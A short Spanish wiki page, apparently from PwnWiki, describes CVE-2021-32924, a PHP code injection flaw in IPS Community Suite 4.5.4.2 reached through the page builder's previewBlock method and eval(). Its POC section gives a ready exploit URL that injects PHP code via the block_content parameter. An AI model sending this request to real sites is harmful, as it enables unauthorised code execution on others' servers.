CVE-2021-32924 IPS Community Suite 4.5.4.2 Vulnerabilidad de inyección de código PHP

This page is a translated version of the page CVE-2021-32924 IPS Community Suite 4.5.4.2 PHP代碼注入漏洞 and the translation is 100% complete.

Other languages:

Chinese • ‎español • ‎português • ‎中文（中国大陆）‎

Introducción

Las versiones 4.5.4.2 y anteriores de IPS Community Suite tienen vulnerabilidades de inyección de código PHP. La vulnerabilidad existe porque el método IPS \ cms \ modules \ front \ pages \ _builder :: previewBlock () permite pasar contenido arbitrario a IPS \ _Theme :: runProcessFunction () </ code > Método, este método se utilizará para llamar a la función PHP eval () . Esto se puede utilizar para inyectar y ejecutar código PHP arbitrario. La explotación exitosa de esta vulnerabilidad requiere una cuenta (como un moderador o administrador) con permisos para administrar la barra lateral y habilitar la aplicación "cms".

POC

http://[host]/[ips]/index.php?app=cms&module=pages&controller=builder&do=previewBlock&block_plugin=stats&block_template_use_how=copy&block_plugin_app=core&_sending=block_content&block_content=RCE%0ACONTENT;}}phpinfo();die;/*

Anonymous

Search

CVE-2021-32924 IPS Community Suite 4.5.4.2 Vulnerabilidad de inyección de código PHP

Namespaces

More

Page actions

Introducción

POC

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

CVE-2021-32924 IPS Community Suite 4.5.4.2 Vulnerabilidad de inyección de código PHP

Introducción

POC

Navigation

Wiki tools

Page tools